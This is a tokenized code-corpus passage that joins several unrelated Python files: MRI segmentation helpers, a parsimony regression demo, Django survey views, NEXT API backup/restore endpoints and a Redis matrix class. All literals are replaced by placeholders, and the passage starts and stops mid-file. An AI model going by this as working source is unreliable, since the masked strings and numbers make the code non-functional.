<NUM_LIT:1> <EOL> printv ( '<STR_LIT>' + str ( adjusted_z ) , verbose ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_local_adjustment ) , plt . plot ( ind_peak , I_corr_adj [ ind_peak ] , '<STR_LIT>' ) <EOL> plt . figure ( fig_local_adjustment ) , plt . savefig ( '<STR_LIT>' + str ( current_disc ) + '<STR_LIT>' ) , plt . close ( ) <EOL> return adjusted_z <EOL> def clean_labeled_segmentation ( fname_labeled_seg , fname_seg , fname_labeled_seg_new ) : <EOL> """<STR_LIT>""" <EOL> run ( '<STR_LIT>' + fname_labeled_seg + '<STR_LIT>' + fname_seg + '<STR_LIT>' ) <EOL> run ( '<STR_LIT>' + fname_labeled_seg + '<STR_LIT>' ) <EOL> data_label_dilate = Image ( '<STR_LIT>' ) . 
data <EOL> run ( '<STR_LIT>' ) <EOL> data_label_bin = Image ( '<STR_LIT>' ) . data <EOL> data_seg = Image ( fname_seg ) . data <EOL> data_diff = data_seg - data_label_bin <EOL> ind_nonzero = np . where ( data_diff ) <EOL> im_label = Image ( '<STR_LIT>' ) <EOL> for i_vox in range ( len ( ind_nonzero [ <NUM_LIT:0> ] ) ) : <EOL> ix , iy , iz = ind_nonzero [ <NUM_LIT:0> ] [ i_vox ] , ind_nonzero [ <NUM_LIT:1> ] [ i_vox ] , ind_nonzero [ <NUM_LIT:2> ] [ i_vox ] <EOL> im_label . data [ ix , iy , iz ] = data_label_dilate [ ix , iy , iz ] <EOL> im_label . setFileName ( fname_labeled_seg_new ) <EOL> im_label . save ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import sct_utils as sct <EOL> import commands <EOL> def test ( path_data ) : <EOL> folder_data = '<STR_LIT>' <EOL> file_data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> cmd = '<STR_LIT>' + path_data + folder_data + file_data [ <NUM_LIT:0> ] + '<STR_LIT>' + path_data + folder_data + file_data [ <NUM_LIT:1> ] + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' <EOL> return commands . getstatusoutput ( cmd ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import parsimony . datasets as datasets <EOL> import parsimony . functions . nesterov . tv as nesterov_tv <EOL> import parsimony . estimators as estimators <EOL> import parsimony . utils as utils <EOL> from parsimony . utils . penalties import l1_max_logistic_loss <EOL> from sklearn . metrics import precision_recall_fscore_support <EOL> from sklearn . linear_model import LogisticRegression <EOL> n_samples = <NUM_LIT> <EOL> shape = ( <NUM_LIT:50> , <NUM_LIT:50> , <NUM_LIT:1> ) <EOL> X3d , y , beta3d , proba = datasets . classification . dice5 . load ( n_samples = n_samples , <EOL> shape = shape , snr = <NUM_LIT:10> , random_seed = <NUM_LIT:1> ) <EOL> X = X3d . reshape ( ( n_samples , np . prod ( beta3d . shape ) ) ) <EOL> n_train = <NUM_LIT> <EOL> Xtr = X [ : n_train , : ] <EOL> ytr = y [ : n_train ] <EOL> Xte = X [ n_train : , : ] <EOL> yte = y [ n_train : ] <EOL> alpha = l1_max_logistic_loss ( Xtr , ytr ) <EOL> ridge_sklrn = LogisticRegression ( C = <NUM_LIT:1.> / ( alpha * n_train ) , fit_intercept = False ) <EOL> yte_pred_ridge = ridge_sklrn . fit ( Xtr , ytr . ravel ( ) ) . predict ( Xte ) <EOL> _ , recall_ridge_sklrn , _ , _ = precision_recall_fscore_support ( yte , yte_pred_ridge , average = None ) <EOL> ridge_prsmy = estimators . RidgeLogisticRegression ( alpha ) <EOL> yte_pred_ridge_prsmy = ridge_prsmy . fit ( Xtr , ytr ) . predict ( Xte ) <EOL> _ , recall_ridge_prsmy , _ , _ = precision_recall_fscore_support ( yte , yte_pred_ridge_prsmy , average = None ) <EOL> l1 , l2 , tv = alpha * np . array ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> A = nesterov_tv . linear_operator_from_shape ( beta3d . shape ) <EOL> enettv = estimators . LogisticRegressionL1L2TV ( l1 , l2 , tv , A , algorithm_params = dict ( eps = <NUM_LIT> ) ) <EOL> yte_pred_enettv = enettv . fit ( Xtr , ytr ) . 
predict ( Xte ) <EOL> _ , recall_enettv , _ , _ = precision_recall_fscore_support ( yte , yte_pred_enettv , average = None ) <EOL> plot = plt . subplot ( <NUM_LIT> ) <EOL> limits = None <EOL> utils . plot_map2d ( beta3d . reshape ( shape ) , plot , title = "<STR_LIT>" ) <EOL> plot = plt . subplot ( <NUM_LIT> ) <EOL> utils . plot_map2d ( enettv . beta . reshape ( shape ) , plot , limits = limits , <EOL> title = "<STR_LIT>" % tuple ( recall_enettv ) ) <EOL> plot = plt . subplot ( <NUM_LIT> ) <EOL> utils . plot_map2d ( ridge_sklrn . coef_ . reshape ( shape ) , plot , limits = limits , <EOL> title = "<STR_LIT>" % tuple ( recall_ridge_sklrn ) ) <EOL> plot = plt . subplot ( <NUM_LIT> ) <EOL> utils . plot_map2d ( ridge_prsmy . beta . reshape ( shape ) , plot , limits = limits , <EOL> title = "<STR_LIT>" % tuple ( recall_ridge_prsmy ) ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> def check_arrays ( * arrays ) : <EOL> """<STR_LIT>""" <EOL> if len ( arrays ) == <NUM_LIT:0> : <EOL> return None <EOL> n_samples = None <EOL> checked_arrays = [ ] <EOL> for array in arrays : <EOL> array = np . asarray ( array , dtype = np . float ) <EOL> if n_samples is None : <EOL> n_samples = array . shape [ <NUM_LIT:0> ] <EOL> if array . shape [ <NUM_LIT:0> ] != n_samples : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( array . shape [ <NUM_LIT:0> ] , n_samples ) ) <EOL> if len ( array . shape ) == <NUM_LIT:1> : <EOL> array = array [ : , np . newaxis ] <EOL> checked_arrays . append ( array ) <EOL> return checked_arrays [ <NUM_LIT:0> ] if len ( checked_arrays ) == <NUM_LIT:1> else checked_arrays <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import doctest <EOL> doctest . testmod ( ) </s>
<s> from neurosynth . base . dataset import Dataset <EOL> from neurosynth . analysis import meta <EOL> import os <EOL> dataset = Dataset ( '<STR_LIT>' ) <EOL> dataset . add_features ( '<STR_LIT>' ) <EOL> print dataset . get_feature_names ( ) <EOL> ids = dataset . get_ids_by_features ( '<STR_LIT>' , threshold = <NUM_LIT> ) <EOL> print len ( ids ) <EOL> ma = meta . MetaAnalysis ( dataset , ids ) <EOL> ma . save_results ( '<STR_LIT>' ) </s>
<s> from django . contrib import admin <EOL> from tastypie . models import ApiAccess <EOL> from django . contrib . gis . admin import OSMGeoAdmin <EOL> from boundaryservice . models import BoundarySet , Boundary <EOL> class ApiAccessAdmin ( admin . ModelAdmin ) : <EOL> pass <EOL> admin . site . register ( ApiAccess , ApiAccessAdmin ) <EOL> class BoundarySetAdmin ( admin . ModelAdmin ) : <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> admin . site . register ( BoundarySet , BoundarySetAdmin ) <EOL> class BoundaryAdmin ( OSMGeoAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> list_display_links = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> admin . site . register ( Boundary , BoundaryAdmin ) </s>
<s> from operator import eq <EOL> import json <EOL> import random <EOL> import datetime <EOL> from collections import OrderedDict <EOL> from django import template <EOL> from django . conf import settings <EOL> from django . http import HttpResponse , HttpResponseRedirect , Http404 <EOL> from django . shortcuts import render , redirect , get_object_or_404 <EOL> from django . contrib import auth <EOL> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . core . mail import send_mail <EOL> from django . template . defaultfilters import slugify <EOL> from bakery . views import BuildableDetailView <EOL> from ratelimit . decorators import ratelimit <EOL> from checkup . models import Survey , Assignment , Question , Answer , Comment <EOL> from checkup . models import Choice , QuestionGroupOrder , Respondent , FormRequest <EOL> from checkup . models import QuestionGroup <EOL> from checkup . forms import SurveyForm <EOL> NO_RESPONSE = "<STR_LIT>" <EOL> base_template = settings . TEMPLATE_BASE if hasattr ( settings , '<STR_LIT>' ) else "<STR_LIT>" <EOL> @ ratelimit ( rate = '<STR_LIT>' , method = None , block = True ) <EOL> def surveyform ( request , assignment_id ) : <EOL> assignment = get_object_or_404 ( Assignment , form_slug = assignment_id ) <EOL> request_key = str ( assignment . id ) + str ( hex ( random . randint ( <NUM_LIT> , <NUM_LIT> ) ) ) <EOL> ip_address = request . META . get ( '<STR_LIT>' , '<STR_LIT>' ) or request . META . get ( '<STR_LIT>' ) <EOL> referer = request . META . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> user_agent = request . META . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> try : <EOL> form_request = FormRequest . objects . create ( key = request_key , assignment = assignment , <EOL> ip_address = ip_address , referer = referer , <EOL> user_agent = user_agent ) <EOL> except : <EOL> form_request = FormRequest . objects . 
create ( key = request_key , assignment = assignment , <EOL> ip_address = '<STR_LIT>' , referer = '<STR_LIT>' , <EOL> user_agent = '<STR_LIT>' ) <EOL> form_request . save ( ) <EOL> complete_check = ( list ( assignment . questions . questions . all ( ) . order_by ( '<STR_LIT:id>' ) . values_list ( '<STR_LIT:id>' , flat = True ) ) <EOL> == list ( assignment . answers . all ( ) . order_by ( '<STR_LIT>' ) . values_list ( '<STR_LIT>' , flat = True ) ) <EOL> and Comment . objects . filter ( assignment = assignment ) . exists ( ) ) <EOL> if complete_check : <EOL> return HttpResponseRedirect ( '<STR_LIT>' + assignment . form_slug + '<STR_LIT:/>' ) <EOL> else : <EOL> Answer . objects . filter ( assignment = assignment ) . delete ( ) <EOL> Comment . objects . filter ( assignment = assignment ) . delete ( ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = SurveyForm ( request . POST , assignment = assignment ) <EOL> if form . is_valid ( ) : <EOL> for key , value in form . cleaned_data . items ( ) : <EOL> if '<STR_LIT>' in key : <EOL> question = Question . objects . get ( pk = int ( key . split ( '<STR_LIT:->' ) [ <NUM_LIT:1> ] ) ) <EOL> group = assignment . questions <EOL> group_order = QuestionGroupOrder . objects . get ( <EOL> question = question , group = group ) <EOL> answer = Answer . objects . get_or_create ( assignment = assignment , <EOL> question = group_order , <EOL> answer = Choice . objects . get ( pk = int ( value ) ) ) <EOL> elif '<STR_LIT>' in key : <EOL> comment = Comment . objects . get_or_create ( assignment = assignment , <EOL> comment = value ) <EOL> complete_check = ( list ( assignment . questions . questions . all ( ) . order_by ( '<STR_LIT:id>' ) . values_list ( '<STR_LIT:id>' , flat = True ) ) <EOL> == list ( assignment . answers . all ( ) . order_by ( '<STR_LIT>' ) . values_list ( '<STR_LIT>' , flat = True ) ) <EOL> and Comment . objects . filter ( assignment = assignment ) . exists ( ) ) <EOL> if complete_check : <EOL> assignment . 
survey_complete = True <EOL> assignment . save ( ) <EOL> email_message = assignment . respondent . first_name + '<STR_LIT:U+0020>' + assignment . respondent . last_name <EOL> email_message += '<STR_LIT>' + assignment . survey . name + '<STR_LIT>' <EOL> email_message += '<STR_LIT>' <EOL> for answer in assignment . answers . all ( ) : <EOL> email_message += answer . question . question . question + '<STR_LIT:\n>' <EOL> email_message += answer . answer . choice + '<STR_LIT:\n>' <EOL> email_message += '<STR_LIT:\n>' <EOL> email_message += '<STR_LIT>' <EOL> email_message += assignment . comment . comment + '<STR_LIT:\n>' <EOL> try : <EOL> send_mail ( '<STR_LIT>' , <EOL> email_message , <EOL> settings . DEFAULT_FROM_EMAIL , <EOL> [ assignment . reporter . user . email ] , <EOL> fail_silently = True ) <EOL> except AttributeError : <EOL> pass <EOL> return HttpResponseRedirect ( '<STR_LIT>' + assignment . form_slug + '<STR_LIT:/>' ) <EOL> else : <EOL> form = SurveyForm ( assignment = assignment ) <EOL> context = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : assignment , <EOL> '<STR_LIT>' : base_template <EOL> } <EOL> return render ( request , '<STR_LIT>' , context ) <EOL> def thanks ( request , assignment_id ) : <EOL> assignment = get_object_or_404 ( Assignment , form_slug = assignment_id ) <EOL> context = { <EOL> '<STR_LIT>' : assignment , <EOL> '<STR_LIT>' : base_template <EOL> } <EOL> return render ( request , '<STR_LIT>' , context ) <EOL> def survey_feed ( request , slug ) : <EOL> survey = get_object_or_404 ( Survey , home_slug = slug ) <EOL> survey_values = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> data = Survey . objects . filter ( pk = survey . id ) . values ( * survey_values ) [ <NUM_LIT:0> ] <EOL> data [ '<STR_LIT>' ] = survey . first_assignment ( ) . get_absolute_url ( ) <EOL> assignments = OrderedDict ( ) <EOL> for assignment in survey . assignments . 
all ( ) : <EOL> new_assign = { } <EOL> new_assign_values = [ '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ; <EOL> new_assign = Assignment . objects . filter ( pk = assignment . id ) . values ( * new_assign_values ) [ <NUM_LIT:0> ] <EOL> new_assign [ '<STR_LIT:url>' ] = assignment . get_absolute_url ( ) ; <EOL> new_assign [ '<STR_LIT>' ] = True if ( hasattr ( assignment , '<STR_LIT>' ) and assignment . comment . comment != '<STR_LIT>' ) else False <EOL> qas = { } <EOL> for q in assignment . questions . questions . all ( ) : <EOL> if Answer . objects . filter ( assignment = assignment , question__question = q ) . exists ( ) : <EOL> a = Answer . objects . get ( assignment = assignment , question__question = q ) <EOL> qas [ '<STR_LIT:%s>' % q . question ] = a . answer . choice <EOL> else : <EOL> qas [ '<STR_LIT:%s>' % q . question ] = NO_RESPONSE <EOL> new_assign [ '<STR_LIT>' ] = qas <EOL> assignments [ '<STR_LIT>' % ( str ( assignment . respondent . title . order ) . zfill ( <NUM_LIT:3> ) , str ( assignment . id ) . zfill ( <NUM_LIT:3> ) ) ] = new_assign <EOL> data [ '<STR_LIT>' ] = assignments <EOL> data = json . dumps ( data , sort_keys = False , indent = <NUM_LIT:4> ) <EOL> return HttpResponse ( data , mimetype = '<STR_LIT:application/json>' ) <EOL> def overview_feed ( request , slug ) : <EOL> '''<STR_LIT>''' <EOL> survey = get_object_or_404 ( Survey , home_slug = slug ) <EOL> survey_values = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> data = Survey . objects . filter ( pk = survey . id ) . values ( * survey_values ) [ <NUM_LIT:0> ] <EOL> data [ '<STR_LIT>' ] = Assignment . objects . filter ( survey = survey ) . count ( ) <EOL> data [ '<STR_LIT>' ] = Assignment . objects . filter ( survey = survey , survey_complete = True ) . count ( ) <EOL> questions = Question . objects . filter ( questiongroup__in = QuestionGroup . objects . filter ( assignment__survey = survey ) . 
distinct ( ) ) . distinct ( ) <EOL> questions_dict = OrderedDict ( ) <EOL> data [ '<STR_LIT>' ] = { NO_RESPONSE : '<STR_LIT>' } <EOL> for q in questions : <EOL> new_q_values = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> new_q = Question . objects . filter ( pk = q . id ) . values ( * new_q_values ) [ <NUM_LIT:0> ] <EOL> new_q [ '<STR_LIT>' ] = Assignment . objects . filter ( survey = survey , questions__questiongrouporder__question = q ) . count ( ) <EOL> new_q [ '<STR_LIT>' ] = Answer . objects . filter ( assignment__survey = survey , question__question = q ) . count ( ) <EOL> new_q [ '<STR_LIT>' ] = new_q [ '<STR_LIT>' ] - new_q [ '<STR_LIT>' ] <EOL> new_q [ '<STR_LIT>' ] = { } <EOL> new_q [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> new_q [ '<STR_LIT>' ] = q . order <EOL> for a in q . choices . all ( ) : <EOL> new_q [ '<STR_LIT>' ] [ '<STR_LIT:%s>' % a . choice ] = Answer . objects . filter ( assignment__survey = survey , question__question = q , answer = a ) . count ( ) <EOL> new_q [ '<STR_LIT>' ] [ a . display . slug ] = { '<STR_LIT:label>' : a . display . display } <EOL> data [ '<STR_LIT>' ] [ a . choice ] = a . display . slug <EOL> questions_dict [ '<STR_LIT:%s>' % str ( q . id ) ] = new_q <EOL> data [ '<STR_LIT>' ] = questions_dict <EOL> data [ '<STR_LIT>' ] = str ( datetime . datetime . now ( ) ) <EOL> data = json . dumps ( data , sort_keys = False , indent = <NUM_LIT:4> ) <EOL> return HttpResponse ( data , mimetype = '<STR_LIT:application/json>' ) <EOL> class BaseView ( BuildableDetailView ) : <EOL> def get_context_data ( self , * args , ** kwargs ) : <EOL> context = super ( BaseView , self ) . get_context_data ( * args , ** kwargs ) <EOL> context [ '<STR_LIT>' ] = base_template <EOL> return context <EOL> class SurveyDetail ( BaseView ) : <EOL> queryset = Survey . objects . 
all ( ) <EOL> slug_field = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> template_name = '<STR_LIT>' <EOL> class AssignmentDetail ( BaseView ) : <EOL> queryset = Assignment . objects . all ( ) <EOL> slug_field = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> template_name = '<STR_LIT>' <EOL> def get_context_data ( self , * args , ** kwargs ) : <EOL> context = super ( AssignmentDetail , self ) . get_context_data ( * args , ** kwargs ) <EOL> try : <EOL> job_desc = "<STR_LIT>" % slugify ( context [ '<STR_LIT>' ] . respondent . title . short ) <EOL> template . loader . get_template ( job_desc ) <EOL> except template . TemplateDoesNotExist : <EOL> job_desc = "<STR_LIT>" <EOL> context [ '<STR_LIT>' ] = job_desc <EOL> context [ '<STR_LIT>' ] = True <EOL> context [ '<STR_LIT>' ] = True <EOL> return context </s>
<s> """<STR_LIT>""" <EOL> from flask import Response , request , redirect <EOL> from flask . ext . restful import Resource , reqparse <EOL> import next . utils <EOL> import next . broker . broker <EOL> from next . api . api_util import * <EOL> from next . api . api_util import APIArgument <EOL> from next . api . keychain import KeyChain <EOL> from next . api . resource_manager import ResourceManager <EOL> from next . database . database_lib import make_mongodump , restore_mongodump <EOL> resource_manager = ResourceManager ( ) <EOL> broker = next . broker . broker . JobBroker ( ) <EOL> keychain = KeyChain ( ) <EOL> post_parser = reqparse . RequestParser ( argument_class = APIArgument ) <EOL> meta_success = { <EOL> '<STR_LIT:code>' : <NUM_LIT:200> , <EOL> '<STR_LIT:status>' : '<STR_LIT:OK>' <EOL> } <EOL> class DatabaseBackup ( Resource ) : <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' . format ( str ( next . utils . datetimeNow ( ) . strftime ( "<STR_LIT>" ) ) , <EOL> '<STR_LIT>' ) <EOL> location = make_mongodump ( name ) <EOL> zip_file = file ( location ) <EOL> return Response ( zip_file , <EOL> mimetype = '<STR_LIT>' , <EOL> headers = { '<STR_LIT>' : <EOL> '<STR_LIT>' . format ( name ) } ) <EOL> class DatabaseRestore ( Resource ) : <EOL> def post ( self ) : <EOL> """<STR_LIT>""" <EOL> name = str ( next . utils . datetimeNow ( ) . strftime ( "<STR_LIT>" ) ) + '<STR_LIT>' <EOL> primary_file = request . files [ '<STR_LIT>' ] <EOL> restore_mongodump ( primary_file , name ) <EOL> return redirect ( '<STR_LIT>' ) </s>
<s> from . LUCB import * </s>
<s> from . BeatTheMean import * </s>
<s> from jinja2 import Environment , FileSystemLoader <EOL> import requests <EOL> import json <EOL> import os <EOL> import next . broker . broker <EOL> from next . api . resource_manager import ResourceManager <EOL> from next . api . targetmapper import TargetMapper <EOL> TEMPLATES_DIRECTORY = os . path . dirname ( __file__ ) <EOL> loader = FileSystemLoader ( TEMPLATES_DIRECTORY ) <EOL> env = Environment ( loader = loader ) <EOL> resource_manager = ResourceManager ( ) <EOL> broker = next . broker . broker . JobBroker ( ) <EOL> targetmapper = TargetMapper ( ) <EOL> class WidgetGenerator ( ) : <EOL> def getQuery ( self , args ) : <EOL> """<STR_LIT>""" <EOL> exp_uid = args [ "<STR_LIT>" ] <EOL> app_id = args [ "<STR_LIT>" ] <EOL> if '<STR_LIT>' in args [ '<STR_LIT:args>' ] . keys ( ) : <EOL> args [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = exp_uid + "<STR_LIT:_>" + args [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] <EOL> args_json = json . dumps ( args [ "<STR_LIT:args>" ] ) <EOL> response_json , didSucceed , message = broker . applyAsync ( app_id , exp_uid , "<STR_LIT>" , args_json ) <EOL> response_dict = json . loads ( response_json ) <EOL> for target_index in response_dict [ "<STR_LIT>" ] : <EOL> target_index [ '<STR_LIT:target>' ] = targetmapper . get_target_data ( exp_uid , target_index [ "<STR_LIT:index>" ] ) <EOL> query = { } <EOL> for target in response_dict [ "<STR_LIT>" ] : <EOL> query [ target [ '<STR_LIT:label>' ] ] = target [ '<STR_LIT:target>' ] <EOL> template = env . get_template ( "<STR_LIT>" ) <EOL> return { '<STR_LIT:html>' : template . render ( query = query ) , '<STR_LIT:args>' : response_dict } <EOL> def processAnswer ( self , args ) : <EOL> """<STR_LIT>""" <EOL> exp_uid = args [ "<STR_LIT>" ] <EOL> app_id = resource_manager . 
get_app_id ( exp_uid ) <EOL> try : <EOL> target_winner = args [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] <EOL> except : <EOL> return { '<STR_LIT:message>' : "<STR_LIT>" , '<STR_LIT:code>' : <NUM_LIT> , '<STR_LIT:status>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <NUM_LIT> <EOL> index_winner = int ( targetmapper . get_index_given_targetID ( exp_uid , target_winner ) ) <EOL> args [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = index_winner <EOL> print args <EOL> args_json = json . dumps ( args [ "<STR_LIT:args>" ] ) <EOL> response_json , didSucceed , message = broker . applyAsync ( app_id , exp_uid , "<STR_LIT>" , args_json ) <EOL> print response_json , didSucceed , message <EOL> return { '<STR_LIT:html>' : "<STR_LIT:success>" } <EOL> def getStats ( self , args ) : <EOL> """<STR_LIT>""" <EOL> exp_uid = args [ "<STR_LIT>" ] <EOL> app_id = resource_manager . get_app_id ( exp_uid ) <EOL> args_json = json . dumps ( args [ "<STR_LIT:args>" ] ) <EOL> response_json , didSucceed , message = broker . applyAsync ( app_id , exp_uid , "<STR_LIT>" , args_json ) <EOL> response_dict = json . loads ( response_json , parse_float = lambda o : round ( float ( o ) , <NUM_LIT:4> ) ) <EOL> try : <EOL> for d in response_dict [ "<STR_LIT:data>" ] : <EOL> try : <EOL> if '<STR_LIT:index>' in d . keys ( ) : <EOL> try : <EOL> d [ "<STR_LIT:target>" ] = targetmapper . get_target_data ( exp_uid , d [ "<STR_LIT:index>" ] ) <EOL> except : <EOL> print "<STR_LIT>" <EOL> except : <EOL> pass <EOL> except : <EOL> pass <EOL> return { '<STR_LIT>' : response_dict } <EOL> def getInfo ( self , args ) : <EOL> """<STR_LIT>""" <EOL> info = { } <EOL> response = resource_manager . get_experiment ( args [ '<STR_LIT>' ] ) <EOL> info [ '<STR_LIT>' ] = response . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> info [ '<STR_LIT>' ] = response . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> info [ '<STR_LIT>' ] = response . get ( "<STR_LIT>" , <NUM_LIT:100> ) <EOL> print info <EOL> return { '<STR_LIT>' : info } </s>
<s> import redis <EOL> import json <EOL> import numpy <EOL> from numpy import * <EOL> BUCKET_KEY = '<STR_LIT>' <EOL> BUCKET_LIMIT = <NUM_LIT> <EOL> EXP_LENGTH = '<STR_LIT>' <EOL> EXP_ID = '<STR_LIT>' <EOL> class Matrix : <EOL> def __init__ ( self , expId , subId , embedding = None ) : <EOL> self . conn = redis . StrictRedis ( host = '<STR_LIT:localhost>' , port = <NUM_LIT> , db = <NUM_LIT:0> ) <EOL> self . expId = expId <EOL> self . subId = subId <EOL> if embedding != None : <EOL> self . save ( self . expId , embedding ) <EOL> def save ( self , expId , embedding ) : <EOL> embedding = array ( embedding , ndmin = <NUM_LIT:2> ) <EOL> pipe = self . conn . pipeline ( ) <EOL> redis_key = '<STR_LIT:%s>' <EOL> length = len ( embedding ) <EOL> if self . exists ( expId , self . subId ) and length < self . __len__ ( expId ) : <EOL> print '<STR_LIT>' <EOL> self . delete ( expId , self . subId ) <EOL> for index in range ( length ) : <EOL> bucket = int ( index / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( expId , bucket , self . subId ) <EOL> val_dict = { '<STR_LIT>' : embedding [ index , : ] . tolist ( ) } <EOL> pipe . hset ( bucketKey , redis_key % index , json . dumps ( val_dict ) ) <EOL> index += <NUM_LIT:1> <EOL> pipe . set ( EXP_LENGTH % ( expId , self . subId ) , length ) <EOL> pipe . execute ( ) <EOL> def getEmbedding ( self ) : <EOL> pipe = self . conn . pipeline ( ) <EOL> blen = int ( self . __len__ ( ) / BUCKET_LIMIT ) <EOL> results = [ ] <EOL> if blen == <NUM_LIT:0> : <EOL> blen = <NUM_LIT:1> <EOL> for i in range ( blen ) : <EOL> pipe . hvals ( BUCKET_KEY % ( self . expId , i , self . subId ) ) <EOL> items = pipe . execute ( ) <EOL> for i in range ( len ( items ) ) : <EOL> for j in range ( len ( items [ i ] ) ) : <EOL> data = json . loads ( items [ i ] [ j ] ) <EOL> results . append ( data [ '<STR_LIT>' ] ) <EOL> return results <EOL> def append ( self , value , expId = None , subId = None ) : <EOL> if expId == None : <EOL> expId = self . 
expId <EOL> if subId == None : <EOL> subId = self . subId <EOL> embedding = array ( value , ndmin = <NUM_LIT:2> ) <EOL> pipe = self . conn . pipeline ( ) <EOL> redis_key = '<STR_LIT:%s>' <EOL> length = len ( embedding ) <EOL> index = self . __len__ ( expId , subId ) <EOL> for i in range ( length ) : <EOL> bucket = int ( index / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( expId , bucket , subId ) <EOL> val_dict = { '<STR_LIT>' : embedding [ i , : ] . tolist ( ) } <EOL> pipe . hset ( bucketKey , redis_key % index , json . dumps ( val_dict ) ) <EOL> index += <NUM_LIT:1> <EOL> pipe . incrby ( EXP_LENGTH % ( expId , subId ) , length ) <EOL> pipe . execute ( ) <EOL> def __getitem__ ( self , key ) : <EOL> if isinstance ( key , slice ) : <EOL> return [ self [ i ] for i in xrange ( * key . indices ( len ( self ) ) ) ] <EOL> elif isinstance ( key , int ) : <EOL> if key < <NUM_LIT:0> : <EOL> key += len ( self ) <EOL> if key < <NUM_LIT:0> : <EOL> raise IndexError , "<STR_LIT>" % key <EOL> if key >= len ( self ) : <EOL> raise IndexError , "<STR_LIT>" % key <EOL> return self . _getRow ( key ) <EOL> elif isinstance ( key , list ) or isinstance ( key , numpy . ndarray ) : <EOL> return self . _getRows ( key ) <EOL> else : <EOL> raise TypeError , "<STR_LIT>" <EOL> def __setitem__ ( self , key , value ) : <EOL> if isinstance ( key , int ) : <EOL> if key < <NUM_LIT:0> : <EOL> key += len ( self ) <EOL> if key < <NUM_LIT:0> : <EOL> raise IndexError , "<STR_LIT>" % key <EOL> if key >= len ( self ) : <EOL> raise IndexError , "<STR_LIT>" % key <EOL> return self . _setRow ( key , value ) <EOL> elif isinstance ( key , list ) : <EOL> print '<STR_LIT:list>' <EOL> length = len ( key ) <EOL> if length != len ( value ) : <EOL> raise TypeError , "<STR_LIT>" <EOL> else : <EOL> return self . _setRows ( key , value ) <EOL> else : <EOL> raise TypeError , "<STR_LIT>" <EOL> def __len__ ( self , expId = None , subId = None ) : <EOL> if expId == None : <EOL> expId = self . 
expId <EOL> if subId == None : <EOL> subId = self . subId <EOL> try : <EOL> return int ( self . conn . get ( EXP_LENGTH % ( expId , subId ) ) ) <EOL> except : <EOL> raise ValueError , "<STR_LIT>" % expId <EOL> def _getRow ( self , index ) : <EOL> bucket = int ( index / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( self . expId , bucket , self . subId ) <EOL> items = self . conn . hget ( bucketKey , index ) <EOL> data = json . loads ( items ) <EOL> return data [ '<STR_LIT>' ] <EOL> def _getRows ( self , index ) : <EOL> numargs = len ( index ) <EOL> pipe = self . conn . pipeline ( ) <EOL> for i in range ( numargs ) : <EOL> if index [ i ] >= self . __len__ ( ) or index [ i ] < <NUM_LIT:0> : <EOL> raise IndexError , "<STR_LIT>" % index [ i ] <EOL> bucket = int ( index [ i ] / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( self . expId , bucket , self . subId ) <EOL> pipe . hget ( bucketKey , index [ i ] ) <EOL> items = pipe . execute ( ) <EOL> results = [ ] <EOL> for i in range ( numargs ) : <EOL> data = json . loads ( items [ i ] ) <EOL> results . append ( data [ '<STR_LIT>' ] ) <EOL> return results <EOL> def _setRow ( self , index , embedding ) : <EOL> embedding = array ( embedding , ndmin = <NUM_LIT:1> ) <EOL> bucket = int ( index / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( self . expId , bucket , self . subId ) <EOL> redis_key = '<STR_LIT:%s>' <EOL> val_dict = { '<STR_LIT>' : embedding . tolist ( ) } <EOL> self . conn . hset ( bucketKey , redis_key % index , json . dumps ( val_dict ) ) <EOL> def _setRows ( self , indexes , rows ) : <EOL> length = len ( indexes ) <EOL> pipe = self . conn . pipeline ( ) <EOL> for i in range ( length ) : <EOL> if indexes [ i ] >= self . __len__ ( ) or indexes [ i ] < <NUM_LIT:0> : <EOL> raise IndexError , "<STR_LIT>" % indexes [ i ] <EOL> bucket = int ( indexes [ i ] / 